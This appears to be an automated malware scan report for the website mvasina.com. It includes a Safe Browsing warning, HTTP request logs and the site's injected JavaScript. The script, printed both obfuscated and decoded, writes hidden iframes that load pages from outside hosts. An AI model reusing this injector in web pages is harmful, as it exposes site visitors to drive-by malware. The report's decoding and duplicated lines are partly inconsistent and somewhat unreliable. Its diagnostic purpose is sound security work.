Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mvasina.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mvasina.com/ | 200 OK Content-Length: 2972 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!39!104!116!116!112!58!47!47!107!108!105!114!101!115!117!116!101!107!46!99!111!109!47!98!117!98!117!46!104!116!109!108!39!32!119!105!100!116!104!61!39!48!39!32!104!101!105!103!104!116!61!39!48!39!32!115!116!121!108!101!61!39!118!105!115!105!98!105!108!105!116!121!58!32!104!105!100!100!101!110!59!39!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out); Decoded script: window.status='Done';document.write('<iframe name=00a4 src=\'http://gerbalaif.info/stds/index.php?'+Math.round(Math.random()*52440)+'5cf745fd374\' width=138 height=380 style=\'display: none\'></iframe>') window.status='Done';document.write('<iframe name=00a4 src=\'http://gerbalaif.info/stds/index.php?'+Math.round(Math.random()*52440)+'5cf745fd374\' width=138 height=380 style=\'display: none\'></iframe>') <iframe name=00a4 src='http://gerbalaif.info/stds/index.php?336645cf745fd374' width=138 height=380 style='display: none'></iframe> Antivirus reports:
| ||
http://mvasina.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mvasina.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Thu, 28 Aug 2014 07:54:20 GMT
Accept-Ranges: bytes
ETag: "af6e4d-b9c-43dc149ae8840"
Server: Apache
Content-Length: 2972
Content-Type: text/html; charset=windows-1251
Expires: Thu, 28 Aug 2014 07:54:20 GMT
Last-Modified: Wed, 31 Oct 2007 03:11:21 GMT
...2972 bytes of data.
GET / HTTP/1.1
Host: mvasina.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Thu, 28 Aug 2014 07:54:20 GMT
Accept-Ranges: bytes
ETag: "af6e4d-b9c-43dc149ae8840"
Server: Apache
Content-Length: 2972
Content-Type: text/html; charset=windows-1251
Expires: Thu, 28 Aug 2014 07:54:20 GMT
Last-Modified: Wed, 31 Oct 2007 03:11:21 GMT
...2972 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mvasina.com
Referer: http://www.google.com/search?q=mvasina.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mvasina.com
Referer: http://www.google.com/search?q=mvasina.com
Result:
The result is similar to the first query. There are no suspicious redirects found.